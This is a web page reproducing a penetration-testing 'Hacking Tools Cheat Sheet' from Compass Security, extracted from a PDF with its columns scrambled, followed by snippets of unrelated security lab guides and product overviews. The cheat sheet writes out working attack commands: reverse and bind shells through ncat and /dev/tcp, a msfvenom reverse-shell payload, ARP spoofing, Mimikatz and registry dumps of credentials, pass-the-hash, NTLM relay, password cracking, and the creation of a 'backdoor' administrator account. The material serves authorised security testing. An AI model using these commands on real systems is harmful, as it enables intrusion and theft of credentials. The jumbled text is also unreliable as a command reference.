DOCSLIB.ORG

Hacking Tools Cheat Sheet

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text

Load more

Start TLS Server: Delete ARP cache: Scan for vulnerabilities (script category filter): Hacking Tools Cheat Sheet # ncat --ssl -l -p 1337 --ssl-cert # ip neigh flush all # nmap -n -Pn --script "vuln and safe" Compass Security, Version 1.1, January 2020 cert.pem --ssl-key key.pem Sniff traffic: 10.5.23.0/24 https://www.compass-security.com Connect to TLS service: # tcpdump [options] [filters] Performance Tuning (1 SYN packet ≈ 60 bytes # ncat --ssl 10.5.23.42 1337 Useful tcpdump options: → 20'000 packets/s ≈ 10 Mbps): Basic Linux Networking Tools Connect to TLS service using openssl: ▪ -i interface: Interface or any for all # nmap -n -Pn --min-rate 20000 10.5.23.0/24 Show IP configuration: # openssl s_client -connect ▪ -n: Disable name and port resolution # ip a l 10.5.23.42:1337 ▪ -A: Print in ASCII Useful nmap options: Change IP/MAC address: Show certificate details: ▪ -XX: Print in hex and ASCII ▪ -n: Disable name and port resolution # ip link set dev eth0 down # openssl s_client -connect ▪ -w file: Write output PCAP file ▪ -PR: ARP host discovery # macchanger -m 23:05:13:37:42:21 eth0 10.5.23.42:1337 | openssl x509 -text ▪ -r file: Read PCAP file ▪ -Pn: Disable host discovery # ip link set dev eth0 up Test TLS server certificate and ciphers: ▪ -sn: Disable port scan (host discovery only) Useful tcpdump filters: # sslyze --regular 10.5.23.42:443 ▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan Static IP address configuration: ▪ not arp: No ARP packets # ip addr add 10.5.23.42/24 dev eth0 ▪ --top-ports 50: Scan 50 top ports TCP to TLS proxy: ▪ port ftp or port 23: Only port 21 or 23 ▪ -iL file: Host input file DNS lookup: # socat TCP-LISTEN:2305,fork,reuseaddr ▪ host 10.5.23.31: Only from/to host ssl:example.com:443 ▪ -oA file: Write output files (3 types) # dig compass-security.com ▪ net 10.5.23.0/24: Only from/to hosts in ▪ -sC: Script scan (default scripts) Reverse DNS lookup: Online TLS tests: network ▪ : Specific scripts # dig -x 10.5.23.42 ▪ ssllabs.com, hardenize.com --script <file/category> Advanced sniffing using tshark or Wireshark. ▪ -sV: Version detection Information Gathering HTTP Tools Sniffing over SSH on a remote host: ▪ -6: IPv6 scan # ssh 10.5.23.42 tcpdump -w- port not The target can be specified using CIDR notation Find owner/contact of domain or IP address: Start Python webserver on port 2305: ssh | wireshark -k -i - # whois compass-security.com # python3 -m http.server 2305 (10.5.23.0/24) or range definitions (10.13- Search in network traffic: 37.5.1-23). Get nameservers and test for DNS zone transfer: Perform HTTP Request: # ngrep -i password # dig example.com ns # curl http://10.5.23.42:2305/?foo=bar Fast scan using masscan: Show HTTP GET requests: # dig example.com axfr @n1.example.com Useful curl options: # masscan -p80,8000-8100 --rate 20000 # urlsnarf 10.0.0.0/8 Get hostnames from CT logs: Search for ▪ -k: Accept untrusted certificates Show transmitted images: %.compass-security.com on https://crt.sh. ▪ -d "foo=bar": HTTP POST data Public internet scan databases: # driftnet ▪ shodan.io, censys.io Or using an nmap script: ▪ -H: "Foo: Bar": HTTP header # nmap -sn -Pn compass-security.com ▪ -I: Perform HEAD request Network Scanning Shells --script hostmap-crtsh ▪ -L: Follow redirects ARP Scan: ▪ -o foobar.html: Write output file Start bind shell (on victim): Combine various sources for subdomain enum: # nmap -n -sn -PR 10.5.23.0/24 # amass enum -src -brute -min-for- ▪ --proxy http://127.0.0.1:8080: Set proxy # ncat -l -p 2305 -e "/bin/bash -i" Reverse DNS lookup of IP range: recursive 2 -d compass-security.com Scan for common files/applications/configs: Connect to bind shell (on attacker): # nmap -sL 10.5.23.0/24 # nikto -host https://example.net # ncat 10.5.23.42 2305 TCP Tools Nmap host discovery (ARP, ICMP, SYN 443/tcp, Enumerate common directory-/filenames: Listen for reverse shell (on attacker): ACK 80/tcp): Listen on TCP port: # gobuster dir -k -u # ncat -l -p 23 # nmap -sn -n 10.5.23.0/24 # ncat -l -p 1337 https://example.net -w Start reverse shell (on victim): Connect to TCP port: /usr/share/wordlists/dirb/common.txt TCP scan (SYN scan = half-open scan): # ncat -e "/bin/bash -i" 10.5.23.5 23 # nmap -Pn -n -sS -p # ncat 10.5.23.42 1337 Start reverse shell with bash only (on victim): Sniffing 22,25,80,443,8080 10.5.23.0/24 # bash -i &>/dev/tcp/10.5.23.5/42 0>&1 TLS Tools ARP spoofing: List Nmap scripts: Upgrade to pseudo terminal: # arpspoof -t 10.5.23.42 10.5.23.1 # ls /usr/share/nmap/scripts Create self-signed certificate: # python -c 'import pty; # openssl req -x509 -newkey rsa:2048 Or a graphical tool: Scan for EternalBlue vulnerable hosts: pty.spawn("/bin/bash")' -keyout key.pem -out cert.pem -nodes # ettercap -G # nmap -n -Pn -p 443 --script smb- -subj "/CN=example.org/" vuln-ms17-010 10.5.23.0/24 Show ARP cache: # ip neigh Vulnerability DBs and Exploits Upgrade to Meterpreter (or press ^Z (Ctrl-Z)): bypass ExecutionPolicy and execute Invoke- Meterpreter via pass-the-hash: background AllChecks. Use the abuse functions. msf > set payload Exploit search (local copy of the Exploit-DB): Background session 1? [y/N] y windows/meterpreter/reverse_tcp Add a new local admin: # searchsploit apache > sessions # list sessions msf > set LHOST 10.5.23.42 # attacker C:\> net user backdoor P@ssw0rd23 Show exploit file path and copy it into clipboard: > sessions -u 1 # Upgrade msf > set LPORT 443 C:\> net localgroup Administrators # searchsploit -p 40142 > sessions 2 # interact with session 2 msf > set RHOST 10.5.23.21 # victim backdoor /add meterpreter > sysinfo # use it msf > set SMBPass 01[...]03:01[...]03 Online vulnerability and exploit databases: Scan for network shares: Upload / download files: msf > exploit ▪ cvedetails.com, exploit-db.com, # smbmap.py --host-file smbhosts.txt - meterpreter > upload pwn.exe meterpreter > shell packetstormsecurity.com u Administrator -p PasswordOrHash meterpreter > download c:\keepass.kdb C:\WINDOWS\system32> Cracking Execute a file: Windows Credentials Gathering NTLM Relay meterpreter > execute -i -f /your/bin Try SSH passwords from a wordlist: Start Mimikatz and create log file: Vulnerable if message_signing: disabled: # ncrack -p 22 --user root -P Port forwarding to localhost: C:\>mimikatz.exe # nmap -n -Pn -p 445 --script smb- ./passwords.txt 10.5.23.0/24 meterpreter > portfwd add -l 2323 -p # privilege::debug security-mode 10.5.23.0/24 3389 -r 10.5.23.23 # log C:\tmp\mimikatz.log Determine hash type: Disable SMB and HTTP in Responder.conf and Background Meterpreter session: # hashid 869d[...]bd88 Read lsass.exe process dump: start Responder: meterpreter > background Show example hash types for hashcat: # sekurlsa::minidump lsass.dmp # ./Responder.py -I eth0 Pivoting through existing Meterpreter session: # hashcat --example-hashes Dump lsass.exe in taskmgr or procdump. NTLM Relay to target and extract SAM file: > use post/multi/manage/autoroute Crack hashes (e.g. 5600 for NetNTLMv2 type): # ./ntlmrelayx.py -smb2support -t > set session 2 # meterpreter session Show passwords/hashes of logged in users: smb://10.5.23.42 # hashcat -m 5600 -a 0 hash.txt > run # sekurlsa::logonpasswords /path/to/wordlists/* > route Backup SYSTEM & SAM hive: NTLM Relay using socks proxy: # ./ntlmrelayx.py -tf targets.txt Crack hashes using John the Ripper: SOCKS via Meterpreter (requires autoroute): C:\>reg save HKLM\SYSTEM system.hiv -smb2support -socks # john hashes.txt > use auxiliary/server/socks4a C:\>reg save HKLM\SAM sam.hiv > set SRVPORT 8080 Extract hashes using Mimikatz: Configure ProxyChains: Metasploit Framework > run # lsadump::sam /system:system.hiv # vi /etc/proxychains.conf [...] Start Metasploit: Configure ProxyChains: /sam:sam.hiv socks4 127.0.0.1 1080 # msfconsole # vi /etc/proxychains.conf Search exploit: [...] Pass-the-Hash Access files via SOCKS proxy: > search eternalblue socks4 127.0.0.1 1080 Shell via pass-the-hash (Impacket Tools): # proxychains smbclient -m smb3 '\\10.5.23.42\C$' -W pc05 -U Connect through SOCKS proxy: # ./psexec.py -hashes Use exploit: Administrator%invalidPwd msf > use exploit/windows/smb/ms17_… # proxychains ncat 172.23.5.42 1337 :011AD41795657A8ED80AB3FF6F078D03 domain/[email protected] Configure exploit: Active Directory Linux Privilege Escalation Over a subnet and extract SAM file: msf exploit(…) > show options Use SharpHound to gather information and im- msf exploit(…) > set TARGET 10.5.23.42 Enumerate local information (-t for more tests): # crackmapexec -u Administrator -H port into Bloodhound to analyze. # curl -o /tmp/linenum :011AD41795657A8ED80AB3FF6F078D03 Run exploit: 10.5.23.0/24 --sam Download PingCastle from pingcastle.com and msf exploit(…) > exploit https://raw.githubusercontent.com/rebo otuser/LinEnum/master/LinEnum.sh Browse shares via pass-the-hash: generate Report. Generate reverse shell (WAR): # bash /tmp/linenum -r /tmp/report # ./smbclient.py # msfvenom -p Other hardening checks can be done using lynis domain/[email protected] -hashes More Online References java/jsp_shell_reverse_tcp LHOST=<your :011AD41795657A8ED80AB3FF6F078D03 ▪ GitHub "swisskyrepo/PayloadsAllTheThings" ip address> LPORT=443 -f war > sh.war or LinPEAS. ▪ GitHub "danielmiessler/SecLists Use sudo/SUID/capabilities/etc. exploits from RDP via pass-the-hash: Reverse shell listener: # xfreerdp /u:user /d:domain /pth: ▪ GitHub "enaqx/awesome-pentest" gtfobins.github.io. > use exploit/multi/handler 011AD41795657A8ED80AB3FF6F078D03 > set payload /v:10.5.23.42 linux/x64/shell_reverse_tcp Windows Privilege Escalation > set LHOST 10.5.23.42 # attacker Copy PowerUp.ps1 from GitHub "Pow- > set LPORT 443 erShellMafia/PowerSploit" into PowerShell to > exploit .
Recommended publications
  • Final Project Report

    Final Project Report

    FINAL REPORT The OS Security Showdown Ciara Dunleavy C00217731 Supervisor Paul J. Barry 30th April 2021 Contents Introduction ............................................................................................................................................ 2 Description of Submitted Project............................................................................................................ 3 Description of Conformance to Specification and Design ...................................................................... 5 Description of Learning ........................................................................................................................... 5 Technical ............................................................................................................................................. 5 Python ............................................................................................................................................. 5 Nmap ............................................................................................................................................... 5 Personal .............................................................................................................................................. 5 Review of Project .................................................................................................................................... 6 Acknowledgements ................................................................................................................................
  • Network Attacks

    Network Attacks

    Blossom—Hands-on exercises for computer forensics and security Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/3.0/. Network Attacks BLOSSOM Manchester Metropolitan University (Funded by Higher Education Academy) [email protected] Blossom—Hands-on exercises for computer forensics and security 1. Learning Objectives This lab aims to understand various network attacks. 2. Preparation 1) Under Linux environment 2) Some documents that you may need to refer to: • 'Virtual-MachineGuide.pdf' • ‘Linux-Guide.pdf’ • ‘BLOSSOM-UserGuide.pdf’ 3. Tasks Setup & Installation: • Start two virtual machines as you have done with previous exercises (see Virtual Machine Guide) # kvm -cdrom /var/tmp/BlossomFiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:57 -net vde -name node-one # kvm -cdrom /var/tmp/BlossomFiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:58 -net vde -name node-two Blossom—Hands-on exercises for computer forensics and security Task 1 DNS Spoofing Attack 1.1 DNS Spoofing is an attack which attempts to redirect traffic from one website to another, and for this task, we will use the network security tool Ettercap. This task also requires a local webserver to be active, such as Apache2. 1.2 On one of the virtual machines, install apache2 and ettercap, and then take note of the IP address of the machine.
  • Secure Shell Encrypt and Authenticate Remote Connections to Secure Applications and Data Across Open Networks

    Secure Shell Encrypt and Authenticate Remote Connections to Secure Applications and Data Across Open Networks

    Product overview OpenText Secure Shell Encrypt and authenticate remote connections to secure applications and data across open networks Comprehensive Data security is an ongoing concern for organizations. Sensitive, security across proprietary information must always be protected—at rest and networks in motion. The challenge for organizations that provide access to applications and data on host systems is keeping the data Support for Secure Shell (SSH) secure while enabling access from remote computers and devices, whether in a local or wide-area network. ™ Strong SSL/TLS OpenText Secure Shell is a comprehensive security solution that safeguards network ® encryption traffic, including internet communication, between host systems (mainframes, UNIX ™ servers and X Window System applications) and remote PCs and web browsers. When ™ ™ ™ ™ Powerful Kerberos included with OpenText Exceed or OpenText HostExplorer , it provides Secure Shell 2 (SSH-2), Secure Sockets Layer (SSL), LIPKEY and Kerberos security mechanisms to ensure authentication security for communication types, such as X11, NFS, terminal emulation (Telnet), FTP support and any TCP/IP protocol. Secure Shell encrypts data to meet the toughest standards and requirements, such as FIPS 140-2. ™ Secure Shell is an add-on product in the OpenText Connectivity suite, which encrypts application traffic across networks. It helps organizations achieve security compliance by providing Secure Shell (SSH) capabilities. Moreover, seamless integration with other products in the Connectivity suite means zero disruption to the users who remotely access data and applications from web browsers and desktop computers. Secure Shell provides support for the following standards-based security protocols: Secure Shell (SSH)—A transport protocol that allows users to log on to other computers over a network, execute commands on remote machines and securely move files from one machine to another.
  • Lab 4: Generating, Capturing and Analyzing Network Scanner Traffic

    Lab 4: Generating, Capturing and Analyzing Network Scanner Traffic

    The Cyber Center for Security and Analytics ZEEK INSTRUSION DETECTION SERIES Lab 4: Generating, Capturing and Analyzing Network Scanner Traffic Document Version: 02-01-2020 Award 1829698 “CyberTraining CIP: Cyberinfrastructure Expertise on High-throughput Networks for Big Science Data Transfers” Lab 4: Generating, Capturing and Analyzing Network Scanner Traffic Contents Overview ............................................................................................................................. 3 Objective ............................................................................................................................. 3 Lab topology........................................................................................................................ 3 Lab settings ......................................................................................................................... 3 Lab roadmap ................................................................................................................... 4 1 Introduction to Internet scanning and probing .......................................................... 4 2 Generating real time network scans ........................................................................... 5 2.1 Starting a new instance of Zeek ........................................................................... 5 2.2 Setting up the Bro2 machine for live network capture ....................................... 6 2.3 Using the Bro1 machine for network scanning activities ...................................
  • PDF with Notes

    PDF with Notes

    Wireless Tools Training materials for wireless trainers This talk covers tools that will show you a great deal of information about wireless networks, including network discovery, data logging, security auditing, and spectrum analysis. Version 1.4 by Rob, @2009-11-23 Version 1.5 by Rob, @2010-02-28 Version 1.6 by Rob, @2010-03-12 Goals ‣ The goal of this talk is to provide an introduction to a few software tools that will help you to: ‣ monitor your WiFi network to identify problems ‣ perform security audits and prevent attacks ‣ observe the ongoing performance of your network and plan for future needs ‣ detect interference 2 Types of wireless tools ‣ Network ESSID scanners ‣ Wireless protocol analyzers ‣ Encryption cracking tools ‣ Wireless device auditing and management ‣ “War driving” tools: network mapping ‣ Spectrum analysis 3 Built-in wireless clients 4 If a computer has a wireless card, it has a basic network scanner. NetStumbler http://www.stumbler.net/ 5 NetStumbler was one of the first and most widely used WiFi detection tools. It runs only in Windows XP or Windows 2000, and works with many (but not all) wireless cards. NetStumbler can be used for mapping the coverage of your WiFi network, War Driving, rogue AP detection, aligning antennas on a long distance link, and more. NetStumbler is not open source, and was last updated in 2004. http://www.vistumbler.net/ 6 Vistumbler is an updated open source network detection tool for Windows Vista and Windows 7. It supports many of the same features as NetStumbler, including network detection and GPS integration. It also works with Google Earth to allow realtime WiFi mapping on a live map.
  • Telnet Client 5.11 Ssh Support

    Telnet Client 5.11 Ssh Support

    TELNET CLIENT 5.11 SSH SUPPORT This document provides This document describes how to install and configure SSH support in Wavelink Telnet Client 5.11. information on the SSH support available in Telnet Client 5.11 OVERVIEW OF SSH SUPPORT Secure Shell (SSH) is a protocol developed for transmitting private information over the Internet. SSH OVERVIEW encrypts data that is transferred over the Telnet session. • Overview of SSH The Telnet Client supports SSH version 1 and 2 and will automatically select the most secure protocol Support that the SSH server supports. • Installing Windows SSH Support This document describes the following: • Configuring the host • Installing Windows SSH support utility profile for SSH • Configuring the host profile for SSH support support • Deploying Windows • Deploying Windows SSH support to the device through Avalanche or ActiveSync SSH Support • Revision History INSTALLING WINDOWS SSH SUPPORT Installing SSH support is a two-step process. First, install SSH support on the PC from which you will deploy Telnet. Once you install SSH support on the PC, use Avalanche or ActiveSync to deploy the utility to the device. To install SSH support on your PC: 1. Obtain the installation executable for SSH support. NOTE: To obtain the Wavelink SSH support utility install, go to http://www.wavelink.com/downloads/ files/sshagreement.aspx. 2. Install SSH support on the PC from which you will deploy the Telnet Client. CONFIGURING THE HOST PROFILE FOR SSH SUPPORT SSH support is configured from the Host Profiles window of the configuration utility. NOTE: SSH is only an active option if SSH support has been installed on the PC running the Telnet Client configuration utility.
  • Networking Telnet

    Networking Telnet

    IBM i Version 7.2 Networking Telnet IBM Note Before using this information and the product it supports, read the information in “Notices” on page 99. This edition applies to IBM i 7.2 (product number 5770-SS1) and to all subsequent releases and modifications until otherwise indicated in new editions. This version does not run on all reduced instruction set computer (RISC) models nor does it run on CISC models. This document may contain references to Licensed Internal Code. Licensed Internal Code is Machine Code and is licensed to you under the terms of the IBM License Agreement for Machine Code. © Copyright International Business Machines Corporation 1998, 2013. US Government Users Restricted Rights – Use, duplication or disclosure restricted by GSA ADP Schedule Contract with IBM Corp. Contents Telnet................................................................................................................... 1 What's new for IBM i 7.2..............................................................................................................................1 PDF file for Telnet........................................................................................................................................ 1 Telnet scenarios...........................................................................................................................................2 Telnet scenario: Telnet server configuration.........................................................................................2 Telnet scenario: Cascaded Telnet
  • Mqtt Protocol for Iot

    Mqtt Protocol for Iot

    Mqtt Protocol For Iot Cleverish Carroll always Italianises his hendecagons if Yehudi is thenar or wattles mindlessly. Choice Che corkagesgoggles very and gracefully disentitle whilehis wheelwrights Donnie remains so perfectively! cactaceous and cloggy. Corollaceous Thaddeus plunge some It easy to fail with durable and recognition from nodes on any protocol for mqtt Secondly, FIWARE does not allow certain characters in its entities names. We answer both pull requests and tickets. Health data distribution hub through replicated copies of iot requirements, ensure that more data format is mqtt protocol for iot. ROS application is running, Dan; Cheng, but basic issues remain. However, MQTT is not meant for dealing with durable and persistent messages. At various devices behind facebook has mqtt protocol was already familiar with clients constantly addsupport for iot device endpoints in no one. Every plugin will provide information as requested by the parser: Provide a edge of supported platforms. YY functionalitywill return service piece of code that distance be added to which source. Error while cleaning up! The mqtt for? Then discarded by a large selection for any system after an access control fields where xmls are read by some of sending of dds network. The iot requirements of false so. We go over these potential values and try to validate the MIC with any of them. Please try for? It of iot device is mqtt protocol for iot. Whether mqtt protocol be subscribed to specific topic, as per art. Mqtt fuzzer is wrong, how mqtt messages then send back a weather service delivery for security. In this hazard, albeit with memory different aim.
  • Lab 3: Scanning and Reconnaissance

    Lab 3: Scanning and Reconnaissance

    CSC 5991 Cyber Security Practice Lab 3: Scanning and Reconnaissance Introduction The key to successfully exploit or intrude a remote system is about the information you have. The first step for penetration is the scanning and reconnaissance. In this lab, you will learn how to use tools to scan and retrieve information from a targeting system. You will be using nmap and OpenVAS to scan a vulnerable machine and identify exploits that can be used to attack it. We will use two Linux virtual machines: One is a Kali Linux with nmap and OpenVAS installed; and the other one is intentionally vulnerable Linux. We will use the nmap and OpenVAS on Kali Linux to scan the vulnerable Linux machine. Software Requirements - The VMWare Software http://apps.eng.wayne.edu/MPStudents/Dreamspark.aspx - The Kali Linux, Penetration Testing Distribution https://www.kali.org/downloads/ - Metasploitable2: Vulnerable Linux Platform http://sourceforge.net/projects/metasploitable/files/Metasploitable2/ - nmap: the Network Mapper - Free Security Scanner https://nmap.org/ - OpenVAS: Open Vulnerability Assessment System http://www.openvas.org/index.html Fengwei Zhang - CSC 5991 Cyber Security Practice 1 Starting the Lab 3 Virtual Machines We need to use two VMs for this lab: the Kali Linux and the Metasploitable2-Linux. First, select the Kali Linux and press Start up Login the Kali Linux with username root, and password [TBA in the class]. Below is the screen snapshot after login. Fengwei Zhang - CSC 5991 Cyber Security Practice 2 Then, you select Metasploitble2-Linux, and press Start up. This is an intentionally vulnerable Linux VM that you will attack against.
  • Metasploit Pro User Guide

    Metasploit Pro User Guide

    4.11 USER GUIDE Getting Started First things first. If you haven't installed Metasploit yet, check out this these instructions if you're a commercial user. Otherwise, if you already have Metasploit installed, congratulations! You've come to the right place to get started. What's Metasploit? Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. The platform includes the Metasploit Framework and its commercial counterparts: Metasploit Pro, Express, Community, and Nexpose Ultimate. Metasploit Framework The Metasploit Framework is the foundation on which the commercial products are built. It is an open source project that provides the infrastructure, content, and tools to perform penetration tests and extensive security auditing. Thanks to the open source community and Rapid7's own hard working content team, new modules are added on a regular basis, which means that the latest exploit is available to you as soon as it's published. There are quite a few resources available online to help you learn how to use the Metasploit Framework; however, we highly recommend that you take a look at the Metasploit Framework Wiki, which is maintained by Rapid7's content team, to ensure that you have the most up to date information available. You can also use the sidebar navigation on the left to view the documentation that is available on this site; just click on the Metasploit Framework topic or search for the topic you want. Either way, if you are unable to find what you need, let us know, and we will add it to the documentation back log.
  • List of NMAP Scripts Use with the Nmap –Script Option

    List of NMAP Scripts Use with the Nmap –Script Option

    List of NMAP Scripts Use with the nmap –script option Retrieves information from a listening acarsd daemon. Acarsd decodes ACARS (Aircraft Communication Addressing and Reporting System) data in real time. The information retrieved acarsd-info by this script includes the daemon version, API version, administrator e-mail address and listening frequency. Shows extra information about IPv6 addresses, such as address-info embedded MAC or IPv4 addresses when available. Performs password guessing against Apple Filing Protocol afp-brute (AFP). Attempts to get useful information about files from AFP afp-ls volumes. The output is intended to resemble the output of ls. Detects the Mac OS X AFP directory traversal vulnerability, afp-path-vuln CVE-2010-0533. Shows AFP server information. This information includes the server's hostname, IPv4 and IPv6 addresses, and hardware type afp-serverinfo (for example Macmini or MacBookPro). Shows AFP shares and ACLs. afp-showmount Retrieves the authentication scheme and realm of an AJP service ajp-auth (Apache JServ Protocol) that requires authentication. Performs brute force passwords auditing against the Apache JServ protocol. The Apache JServ Protocol is commonly used by ajp-brute web servers to communicate with back-end Java application server containers. Performs a HEAD or GET request against either the root directory or any optional directory of an Apache JServ Protocol ajp-headers server and returns the server response headers. Discovers which options are supported by the AJP (Apache JServ Protocol) server by sending an OPTIONS request and lists ajp-methods potentially risky methods. ajp-request Requests a URI over the Apache JServ Protocol and displays the result (or stores it in a file).
  • SOCKS Protocol Version 6

    SOCKS Protocol Version 6

    SOCKS Protocol Version 6 draft-olteanu-intarea-socks-6-08 Vladimir Olteanu IETF 106 What’s new ● DNS provided by SOCKS ● Options for Happy Eyeballs at the proxy Clients need DNS-like features ● A and AAAA – LD_PRELOAD for non-SOCKS-aware apps: gedaddrinfo() separate from connect() – Happy Eyeballs: need to do queries separately ● TXT – ESNI ● MX, Service Binding, etc. – <Insert future use case here> Providing DNS-like features ● Individual SOCKS options (removed in -08) – Have to keep up with use cases – Duplicate DNS functionality – Until -07: A, AAAA, PTR ● Having the client use DNS – Hard to convey policies: resolver IPs, plaintext / over TLS / over HTTPS etc., maybe credentials, etc. – Provide a DNS proxy Why not separate DNS from SOCKS? Client Proxy Server HTTP/SOCKS :1080 HTTP :80 DNS :53 Why not separate DNS from SOCKS? Client Proxy Server HTTP/SOCKS :1080 HTTP :80 DNS :53 WHICH TOR CIRCUIT? ● Need context for DNS query – Otherwise: privacy leaks, suboptimal CDN use DNS provided by SOCKS ● Clients make CONNECT request to 0.0.0.0:53 – Proxy needn’t provide a valid bind address ● Plaintext DNS over SOCKS (opt. over TLS) – TCP by default: SOCKS + UDP more cumbersome to use ● Implementation in Sixtysocks – Run separate DNS proxy locally – Translate 0.0.0.0:53 to 127.0.0.1:53 Happy Eyeballs ● RFC 8305: resolve and connect to a server using both IPv4 and IPv6, keep only one connection – Failover from IPv6 to IPv4 – Better responsiveness if one is faster ● Clients can implement Happy Eyeballs locally – Have DNS + CONNECT Happy Eyeballs: